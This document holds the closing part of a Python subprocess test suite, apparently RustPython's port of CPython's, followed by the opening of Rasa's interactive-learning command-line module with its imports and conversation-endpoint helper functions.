self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_kill_dead(self):
self._kill_dead_process('kill')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_call_keyboardinterrupt_no_kill = unittest.expectedFailure(test_call_keyboardinterrupt_no_kill)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_run_keyboardinterrupt_no_kill = unittest.expectedFailure(test_run_keyboardinterrupt_no_kill)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_getoutput = unittest.expectedFailure(test_getoutput)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_invalid_args = unittest.expectedFailure(test_invalid_args)
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union, Set
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from rasa.nlu.training_data.loading import MARKDOWN, RASA
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cli_utils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.importers.rasa import TrainingDataImporter
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION = 200
DEFAULT_STORY_GRAPH_FILE = "story_graph.dot"
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
conversation_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload,
method="post",
subpath=f"/conversations/{conversation_id}/messages",
)
async def request_prediction(
endpoint: EndpointConfig, conversation_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath=f"/conversations/{conversation_id}/predict"
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
conversation_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = f"/conversations/{conversation_id}/tracker?include_events={verbosity.name}"
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
conversation_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = f"/conversations/{conversation_id}/execute"
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
f"WARNING: You have created a new action: '{action_name}', "
f"with matching template: '{[*NEW_TEMPLATES[action_name]][0]}'. "
f"This action will not return its message in this session, "
f"but the new utterance will be saved to your domain file "
f"when you exit and save this session. "
f"You do not need to do anything further."
)
await _ask_questions(warning_questions, conversation_id, endpoint)
else:
warning_questions = questionary.confirm(
f"WARNING: You have created a new action: '{action_name}', "
f"which was not successfully executed. "
f"If this action does not return any events, "
f"you do not need to do anything. "
f"If this is a custom action which returns events, "
f"you are recommended to implement this action "
f"in your action server and try again."
)
await _ask_questions(warning_questions, conversation_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, conversation_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
conversation_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = f"/conversations/{conversation_id}/tracker/events"
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cli_utils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cli_utils.element_to_string(element, idx)
output += "\n" + element_str
